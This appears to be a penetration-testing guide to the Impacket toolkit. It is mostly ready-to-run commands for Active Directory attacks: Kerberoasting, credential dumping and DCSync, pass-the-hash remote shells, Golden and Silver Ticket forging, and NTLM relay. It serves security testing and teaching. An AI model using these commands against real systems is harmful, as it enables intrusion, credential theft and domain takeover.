Impacket is a collection of Python classes and scripts for working with network protocols, with a heavy focus on Windows and Active Directory environments. It’s a cornerstone of modern Active Directory penetration testing. This guide covers the most useful tools in the Impacket suite.
Installation
# Kali Linux (pre-installed)
impacket-secretsdump --help
# Manual install
pip3 install impacket
# Or from source (latest)
git clone https://github.com/fortra/impacket
cd impacket && pip3 install .
Scripts are typically prefixed with impacket- on Kali, or run directly as python3 script.py from source.
Kerberoasting: GetUserSPNs
Kerberoasting extracts service tickets for accounts with Service Principal Names (SPNs) and cracks them offline.
impacket-GetUserSPNs domain.local/user:password -dc-ip 192.168.1.10 -request
Output is a Kerberos TGS hash crackable with Hashcat:
hashcat -m 13100 -a 0 kerberoast.txt rockyou.txt -r rules/best64.rule
Without credentials (using LDAP anonymous bind if enabled):
impacket-GetUserSPNs domain.local/ -dc-ip 192.168.1.10 -no-pass
AS-REP Roasting: GetNPUsers
Targets accounts with Kerberos pre-authentication disabled:
# With a user list
impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip 192.168.1.10 -no-pass
# Authenticated scan for all vulnerable accounts
impacket-GetNPUsers domain.local/user:password -dc-ip 192.168.1.10 -request
Crack the resulting AS-REP hashes:
hashcat -m 18200 asrep_hashes.txt rockyou.txt
SecretsDump: Dumping Credentials
One of the most powerful tools in Impacket. Dumps hashes from SAM, LSA, NTDS.dit, and DPAPI.
Remote dump (requires admin credentials)
impacket-secretsdump domain/admin:[email protected]
DC sync (domain admin required)
Replicates the NTDS.dit remotely without touching disk:
impacket-secretsdump domain.local/admin:password@dc-ip -just-dc
impacket-secretsdump domain.local/admin:password@dc-ip -just-dc-user krbtgt
This gives you the krbtgt hash for Golden Ticket attacks.
Pass-the-Hash with SecretsDump
impacket-secretsdump domain/[email protected] -hashes :NTLMhash
PSExec
Creates a service on the target for command execution:
impacket-psexec domain/admin:[email protected]
impacket-psexec domain/[email protected] -hashes :NTLMhash
This gives a SYSTEM shell but is very noisy (creates services, writes files).
WMIExec
Executes commands via WMI — noisier than smbexec but more reliable:
impacket-wmiexec domain/admin:[email protected]
impacket-wmiexec domain/[email protected] -hashes :NTLMhash cmd.exe
SMBExec
Quieter than PSExec — uses a temporary service but doesn’t drop a binary:
impacket-smbexec domain/admin:[email protected]
ATExec
Executes via the Task Scheduler service:
impacket-atexec domain/admin:[email protected] whoami
Ticket Attacks
Golden Ticket
Requires krbtgt hash (from DCSync). Creates a forgeable TGT valid for any account:
impacket-ticketer -nthash <krbtgt_hash> \
-domain-sid S-1-5-21-xxxx-xxxx-xxxx \
-domain domain.local \
administrator
Use the ticket:
export KRB5CCNAME=administrator.ccache
impacket-psexec -k -no-pass domain.local/[email protected]
Silver Ticket
Forges a service ticket for a specific service using the service account hash:
impacket-ticketer -nthash <service_account_hash> \
-domain-sid S-1-5-21-xxxx \
-domain domain.local \
-spn cifs/server.domain.local \
administrator
Network Scanning and Enumeration
SMB Enumeration
# List shares
impacket-smbclient domain/user:[email protected]
# Inside smbclient
shares # list shares
use C$ # mount C$ share
ls # list files
get file.txt
LDAP Queries
# Dump AD users
impacket-ldapdomaindump -u domain/user -p password 192.168.1.10
# Output: domain_users.html, domain_computers.html, etc.
Relay Attacks
NTLMRelayx
Relay NTLM authentication to other targets (combine with Responder):
# Turn off SMB/HTTP in Responder, then run:
impacket-ntlmrelayx -tf targets.txt -smb2support
# Start Responder (on a different interface or with SMB off)
responder -I eth0 -rdw
When a victim authenticates to your Responder listener, ntlmrelayx relays it to the targets.
For interactive shell relay:
impacket-ntlmrelayx -tf targets.txt -smb2support -i
Then connect: nc 127.0.0.1 11000
Practical AD Pentest Flow with Impacket
- Enumerate SPNs with GetUserSPNs, crack offline
- Check for ASREPRoastable accounts with GetNPUsers
- Relay attacks if NTLM signing disabled (check with
nmap --script smb2-security-mode)
- SecretsDump once you have local admin anywhere
- DCSync once you reach domain admin
Impacket scripts require a basic Python environment and work on Linux, macOS, and Windows. Keep it updated — it receives frequent improvements for new attack techniques.